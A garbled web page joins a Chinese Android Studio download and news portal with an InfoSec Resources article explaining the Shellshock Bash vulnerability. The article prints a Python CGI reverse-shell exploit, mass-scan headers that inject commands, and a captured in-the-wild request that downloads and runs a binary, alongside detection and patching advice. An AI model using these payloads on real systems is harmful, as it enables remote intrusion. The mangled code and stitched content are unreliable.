Android Studio 2.2 Download - From dl.Google
PlatformAndroid Studio packageSizeSHA-1 checksum
Includes Android SDK (recommended)
1181 MB( bytes)
6f7fcdc3fbd5a14c2b0
No Android SDK
270 MB( bytes)
d8cb5f4effe727baf23b18b9f8360
No Android SDK, no installer
286 MB( bytes)
9becac16ac7fde63a50f3fbc1eec4d9
284 MB( bytes)
4a7caee59edf0272472
284 MB( bytes)
55d69ad2dab26ba43550fbcbeb7e9
If you do not need Android Studio, you can download the basic Android command line tools below.
PlatformSDK tools packageSizeSHA-1 checksum
144 MB ( bytes)
f9b59defea0b
No installer
190 MB ( bytes)
66b6ab22bf8cab19c0f3fef4eba49
98 MB ( bytes)
85a9cccb0b1f9e6f1ffcd
311 MB ( bytes)
725bb360f0f7d04eaccff5a2d57abddd
用户评价:  / 16
钢筋与 LED 交织的露天舞台,双肩包和文化衫组合的黑压压人群,热火朝天的集市与展位,还有隔海相望的 100 万中国观众,你以为这是一场狂欢的音乐节,其实它叫 Google I/O。
欢迎来到离未来最近的发布会。
Google Assistant: 一句 OK, Google,多少手指都用不上了
人工智能是今年的 Google I/O 的一大主题。在发布会一开始,Google CEO 桑达拉·皮蔡(Sundar Pichai)就强调机器学习在生活中扮演的重要角色。随后,一系列基于 Google 人工智能的产品纷至沓来。
OK, Google. 这句耳熟能详的命令,如今承载了 Google 全新的产品——Google Assistant.
之所以 Google Assistant 是发布会上首个亮相的产品,是因为后续登场的数个产品都基于这一技术。Google 用将近十年的时间,改善自己的语音识别技术,更强调自然语义和对话式搜索。
用户评价:  / 392
Android Studio 2.0 网盘下载
版本号WindowsMac OSXLinux
Android Studio 2.0 正式版
SDK tools r24.4.1 ( for Android Studio 2.0) 网盘下载
版本号WindowsMac OSXLinux
SDK tools r24.4.1 ( for Android Studio 2.0)
用户评价:  / 17
Posted by Jamal Eason, Product Manager, Android
Android Studio 2.0 is the fastest way to build high quality, performant apps for the Android platform, including phones and tablets, Android Auto, Android Wear, and Android TV. As the official IDE from Google, Android Studio includes everything you need to build an app, including a code editor, code analysis tools, emulators and more. This new and stable version of Android Studio has fast build speeds and a fast emulator with support for the latest Android version and Google Play Services.
Android Studio is built in coordination with the Android platform and supports all of the latest and greatest APIs. If you are developing for Android, you should be using Android Studio 2.0. It is available today as a easy download or update on the stable release channel.
Android Studio 2.0 includes the following new features that Android developer can use in their workflow :
Instant Run - For every developer who loves faster build speeds. Make changes and see them appear live in your running app. With many build/run accelerations ranging from VM hot swapping to warm swapping app resources, Instant Run will save you time every day.
Android Emulator - The new emulator runs ~3x faster than Android’s previous emulator, and with ADB enhancements you can now push apps and data 10x faster to the emulator than to a physical device. Like a physical device, the official Android emulator also includes Google Play Services built-in, so you can test out more API functionality. Finally, the new emulator has rich new features to manage calls, battery, network, GPS, and more.
Cloud Test Lab Integration - Write once, run anywhere. Improve the quality of your apps by quickly and easily testing on a wide range of physical Android devices in the Cloud Test Lab right from within Android Studio.
App Indexing Code Generation & Test - Help promote the visibility your app in Google Search for your users by adding auto-generated URLS with the App Indexing feature in Android Studio. With a few click you can add indexable URL links that you can test all within the IDE.
GPU Debugger Preview - For those of you developing OpenGL ES based games or apps, you can now see each frame and the GL state with the new GPU debugger. Uncover and diagnosis GL rendering issues by capturing and analyzing the GPU stream from your Android device.
IntelliJ 15 Update - Android Studio is built on the world class Intellij coding platform. Check out the latest Intellij features here.
Deeper Dive into the New Features
Instant Run
Today, mobile platforms are centered around speed and agility. And yet, building for mobile can sometimes feel clunky and slow. Instant Run in Android Studio is our solution to keep you in a fast and fluid development flow. The feature increases your developer productivity by accelerating your edit, build, run cycles. When you click on the Instant Run button (), Instant Run will analyze the changes you have made and determine how it can deploy your new code in the fastest way.
New Instant Run Buttons
用户评价:  / 449
Android Studio
版本号WindowsMac OSXLinux
2.0 preview4
2.0 preview
用户评价:  / 19
TensorFlow内建深度学习的扩展支持,不止于此——任何能够用计算流图形来表达的计算,都可以使用TensorFlow。任何基于梯度的机器学习算法都能够受益于TensorFlow的自动分化(auto-differentiation)。通过灵活的Python接口,要在TensorFlow中表达想法也会很容易。
更多文章...
使用教程持续更新
Android 开发工具箱
Android 开发利器
Android Studio
安卓相关交流群
Android 相关QQ群
2016高薪职位推荐
资深就该付出就该
Android Studio 视频演示
无内联框架Exploiting and Verifying Shellshock: CVE- - InfoSec Resources
Exploiting and Verifying Shellshock: CVE-
on September 27, 2014
Ethical Hacking Boot Camp
Our most popular course!
Practice for certification success with the . We analyze your responses and can determine when you are ready to sit for the test.
Everything you need to know about the Bash Bug vulnerability
The Bash Bug vulnerability ()
A new critical vulnerability, remotely exploitable, dubbed “Bash Bug”, is threatening billions of machines all over the world.
The vulnerability was discovered by the security researcher Stephane Chazelas at Akamai firm. It affects Linux and Unix command-line shell, aka the GNU Bourne Again Shell, and for this reason it is potentially exposing websites, servers, PCs, OS X Macs, various , and many other devices to risk of cyber attacks.
Ethical Hacking Training – Resources (InfoSec)
The team Bash stands for the GNU Bourne Again Shell and refers to a Unix shell, which is an interpreter that allows users to send commands on Unix and Linux systems, typically by connecting over SSH or Telnet.
The Bash can also operate as a parser for CGI scripts on a Web server. Stephane explained that the vulnerability has existed for several decades and it is related to the way Bash handles specially-formatted environment variables, namely exported shell functions.
A shell gives both administrators and attackers high privileged access to operating system features, allowing them to run almost any command.
“The potential is enormous – ‘getting shell’ on a box has always been a major win for an attacker because of the control it offers them over the target environment,” said software architect and Microsoft MVP Troy Hunt.
An attacker could dump all data stored on a server, change its settings, or serve malicious code to infect the machine.
“There are many, many examples of exploits out there already that could easily be fired off against a large volume of machines.”
The National Institute of Standards and Technology has assigned the vulnerability the designation , rating the severity of the remotely exploitable vulnerability as a  on its 10-point scale.
The critical Bash Bug vulnerability, also dubbed Shellshock, affects versions GNU Bash versions ranging from 1.14 through 4.3. A threat actor could exploit it to execute shell commands remotely on a targeted machine using specifically crafted variables.
To run an arbitrary code on a system running software which embeds a Bash, it is necessary to assign a function to a variable. Trailing code in the function definition will be executed.
Figure 1 – Shellshock command diagram (Symantec)
“GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution,” states the description for the Bush Bug flaw on the NIST National Vulnerability Database, which rated its severity as 10 out of 10.
Every machine having Bash configured as the default system shell could be easily hacked every time an application invokes the Bash shell command (e.g. Mail server) via HTTP or a Common-Gateway Interface (CGI).
The attacker could run arbitrary code on the server just by sending a specially crafted malicious web request by setting headers in a web request, or by setting weird mime types. Searching on the Internet, it is possible to find the source code for cgi-bin reverse shell reported below:
#CVE- bincgi- reverse shell
import ,,httpliburllibsys
if (len(sys.argv)&4):
print &Usage: %s &host& &vulnerable CGI& &attackhost/IP&& % sys.argv[0]
print &Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080& % sys.argv[0]
conn = httplib.(sys.[HTTPConnectionargv1])
reverse_shell=&() {};/bin/bash -i && /dev/tcp/%s 0&&1& % sys.argv[3]
headers = {&Content-type&: &application/x-www-form-urlencoded&,
&test&:reverse_shell }
conn.request(&GET&,sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
Similar attacks are possible via OpenSSH. “We have also verified that this vulnerability is exposed in ssh—but only to authenticated sessions. Web applications like cgi-scripts may be vulnerable based on including calling other applications through a shell, or evaluating sections of code through a shell,” Stephane warned. But if an attacker does not have an SSH account, this exploit would not work.
As reported in the advisory published by the NIST, the critical instances where the Bash Bug may be exposed include:
Apache HTTP Server using mod_cgi or mod_cgid scripts either written in bash, or spawn subshells.
Override or Bypass ForceCommand feature in OpenSSH sshd and limited protection for some Git and Subversion deployments used to restrict shells and allow arbitrary command execution capabilities.
Allow arbitrary commands to run on a DHCP client machine, various Daemons and SUID/privileged programs.
Exploit servers and other Unix and Linux devices via Web requests, secure shell, Telnet sessions, or other programs that use Bash to execute scripts.
Billions of servers affected by the Bash Bug flaw
The impact of the Bash Bug vulnerability is widely extended. Bash is commonly used to execute commands on a server, especially those sent by other programs and applications. Security experts are considering the severity of this vulnerability higher than the one assigned to the
bug, and the most concerning issue is the low level of complexity needed to run an attack which exploits it.
“The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we’ll never be able to catalogue all the software out there that is vulnerable to the bash bug,” states Robert Graham on his Blog .
“They go on to rate it a “10 out of 10″ for severity or in other words, as bad as it gets. This is compounded by the fact that it’s easy to execute the attack (access complexity is low) and perhaps most significantly, there is no authentication required when exploiting Bash via CGI scripts. The summary above is a little convoluted though so let’s boil it down to the mechanics of the bug,” added the security expert Troy Hunt.
The Bug Bash flaw is particularly dangerous for
devices like smart meters, routers, web cameras and any other device that runs software, which allows bash scripts. Typically, such software is not easy to fix and are more likely to expose the critical flaw in the Internet.
As said by Graham, “Unlike Heartbleed, which only affected a specific version of OpenSSL, this bash bug has been around for a long, long time. That means there are lots of old devices on the network vulnerable to this bug. The number of systems needing to be patched, but which won’t be, is much larger than Heartbleed.”
According the results of a recent survey conducted by the Internet services company , the number and types of Web servers being used worldwide is more than 1 billion servers, and that more than half of those are Apache servers which run Linux and thus contain Bash by default.
Figure 2 – Market share of active sites (Netcraft Survey 2014)
The list of potential targets is very long and includes home routers, medical equipment,
and many other systems. For this reason, the Bash Bug is considered by security experts more dangerous than the
flaw which affected only versions of OpenSSL released over a two-year period. According to the experts, the Bash bug has is a 25 five year old flaw, and also recent versions of Linux machines are potentially as exploitable as outdated servers.
The real problem resides in the low complexity of a Bash Bug based attack, for threat actors it is quite easy to run them against vulnerable servers.
Threat actors are exploiting the Bash Bug vulnerability in the wild
According to security experts, the Bash Bug vulnerability may already have been exploited in the wild by threat actors to hit Web servers.
Attackers are already targeting the Bash vulnerability, less than 24 hours after the public disclosure of details about the flaw vulnerability. To date, an unknown number of devices may contain the flaw, including millions of stand-alone Web servers, Unix and Mac OS X systems, and numerous other Internet-connected devices.
Malware researchers speculated that the critical flaw may be exploited by attackers which manage
to exploit a large number of machines exposed on the Internet.
Figure 3 – Mikko Hypponen on the Bash Bug
Security experts and hackers are already running, for different purposes, a
to discover vulnerable servers in the wild and compromise them. In a blog post published on the Errata Security blog, the expert Robert Graham revealed to have conducted a similar experiment discovering more than 3,000 servers affected by the Bash Bug before his scan broke after a short period.
The configuration file formasscan used by the expert looks something like:
target = 0.0.0.0/0
banners = true
http-user-agent = shellshock-scan (/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74
Robert Graham sent the requests to a range of vulnerable IP addresses, requesting to the targeted machined to ping the IP address 209.126.230.74. This means that the security expert, simply by issuing a carefully crafted request over the web, requested the execution of the PING command.
Figure 4 – Robert Robert Test Results
Unfortunately, the number of vulnerable machines is greater than 3000, as revealed by Graham, who searched for affected servers only querying the port 80 used for normal Web Hypertext Transfer Protocol (HTTP) requests.
“It’s things like CGI scripts that are vulnerable, deep within a website (like CPanel’s /cgi-sys/defaultwebpage.cgi),” Graham wrote. “Getting just the root page is the thing least likely to be vulnerable. Spidering the site and testing well-known CGI scripts (like the CPanel one) would give a lot more results—at least 10x.”
According to the results of different research conducted by experts at
using Google advanced search parameters, the number of web pages potentially exploitable for the presence of the Bash Bug vulnerability is over two billion.
Graham has confirmed that “this thing is clearly wormable and can easily worm past firewalls and infect lots of systems. One key question is whether Mac OS X and iPhone DHCP service is vulnerable—once the worm gets behind a firewall and runs a hostile DHCP server, that would be ‘game over’ for large networks.”
Resuming, we have a critical flaw that affects an impressive number of devices worldwide, and in many cases these systems are not easily to patch. Let’s consider for example Internet-of-Things components which run software with Bash embedded.
It’s very likely that the vulnerability has already been exploited in the wild. A system administrator using the @yinettesys Twitter account published a
reported on
in which threat actors exploited the Bash Bug flaw to launch a kernel exploit on a machine coordinating the attack with a C&C server hidden behind the Cloudflare content delivery network.
“I am not feeling well, but this is important. It’s the first 0day bash injected ELF malware spotted in ITW attack of CVE-. This sample was found via @Yinettesys’s (credit) IDS sigs:
The sample is up and alive, my analysis I posted in VT (see the comment tab):
Announced was 6h ago here:
And detection ratio is still ZERO.. “
The malicious campaign uses a Web GET request from a user agent called “.Thanks-Rob”
GET./.HTTP/1.0.
User-Agent:.Thanks-Rob.
Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/.chmod.777./tmp/./tmp/
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/.chmod.777./tmp/./tmp/
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/.chmod.777./tmp/./tmp/
.Accept:.*/*
The attack appears to be a brute force based on a dictionary of credentials guesses. The malicious code served in the attack is , which is still undetected by all the antivirus software at the time I’m writing.
The exploit targets the server’s “/tmp” directory in a subdirectory called “besh.”
The experts noticed that the malware contact the CnC server sending the text “PING” and received in return the response “PONG.”
“Oddly,
who ran the binary of the malware on a virtual machine, the malware also sends a request to a
(now removed) that was associated with an ,” reports a blog post on the Bash Bug published by Ars Technica.
This week, and
reported that the Bash Bug is being exploited in the wild.
Geoff Walton, Senior Security Consultant at TrustedSec, described in a blog post a
for using Bash Bug to target DNS.
In the below image is the tool designed for the test, just setting the string value for 114 to: () {}; echo ‘foo’
Figure 5 – POC tool
In the POC, simply replacing the portion of the string “echo ‘foo'” with the command we want the client to execute, it is possible to exploit the flaw.
How to verify if a system is compromised
Administrators could easily evaluate if a Linux or Unix system is vulnerable by running a diagnostic test proposed by .
$ env x='() { :;}; echo vulnerable' bash -c &echo this is a test&
If the output of the above command looks as follows:
vulnerable this is a test
You are using a vulnerable version of Bash. The patch used to fix this issue ensures that no code is allowed after the end of a Bash function. Thus, if you run the above example with the patched version of Bash, you should get an output similar to:
$ env x='() { :;}; echo vulnerable' bash -c &echo this is a test& bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test
If your system is vulnerable, to fix the issue update to the most recent version of the Bash package by running the following command:
# yum update bash
Figure 6 – Bash Bug system check
To mitigate the Bash Bug, it is recommended to disable any CGI scripts that call on the shell and as soon as possible upgrade your bash software package. Principal Linux distribution vendors have released the new Bash software versions:
Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
(versions 5 through 7)
10.04 LTS, 12.04 LTS, and 14.04 LTS
Security advisories issued for the newly discovered flaw, which include the above patch information, are available at the following URLs.
Red Hat—*
Novell/SUSE—
Are Microsoft machines exposed to the Bash Bag?
Bash is not present natively on Windows machines. This means that they are not exposed to the vulnerability, however there are several Bash implementations on the market (e.g. Win-bash) and they have to be audited to evaluate the level of exposure.
According to Microsoft MVP expert Troy Hunt, there could be “non-Microsoft components sitting in front of their Microsoft application stack, components that the traffic needs to pass through before it hits the web servers. These are also components that may have elevated privileges behind the firewall.”
In this moment, it is not clear what the impact of the Bash Bug, aka Shellshock, will be on those architectures.
Is it possible to detect if someone has exploited the flaw in an attack against a system?
As explained by an interesting Q&A post published by experts at Securelist, it is suggested to review HTTP logs and check if there is anything suspicious.
An example of a malicious pattern could be:
192.168.1.1 – – [25/Sep/:00 +0000] “GET / HTTP/1.0	 “() { :; }; wget -O /tmp/besh http://192.168.1.1/ chmod 777 /tmp/ /tmp/”
References
/blog/research/66673/bash-cve--vulnerability-qa-2/
Pierluigi Paganini is Chief Information Security Officer at Bit4Id, firm leader in identity management, member of the ENISA (European Union Agency for Network and Information Security)Treat Landscape Stakeholder Group, he is also a Security Evangelist, Security Analyst and Freelance Writer.
Editor-in-Chief at Cyber Defense magazine, Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to create the blog "Security Affairs," recently named a Top National Security Resource for US.
Pierluigi is a member of the The Hacker News team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News magazine and for many other security magazines. He is the author of the books The Deep Dark Web and Digital Virtual Currency and Bitcoin.
Free Training Tools
Editors Choice
Related Boot Camps
More Posts by Author
File download
First Name
Work Phone Number
Work Email Address
How will you fund your training?
No current plan
Employer Paid
Tuition Assistance
Why Take This Training?
I'm not interested in training
To get certified - company mandated
To get certified - my own reasons
To improve my skillset - get a promotion
To improve my skillset- for a new job
InfoSec institute respects your privacy and will never use your personal information for anything other than to notify you of your requested course pricing. We will never sell your information to third parties. You will not be spammed.
What is Skillset?
Practice tests & assessments.
Practice for certification success with the Skillset library of over 100,000 practice test questions. We analyze your responses and can determine when you are ready to sit for the test. Along your journey to exam readiness, we will:
1. Determine which required skills your knowledge is sufficient
2. Which required skills you need to work on
3. Recommend specific skills to practice on next
4. Track your progress towards a certification exam
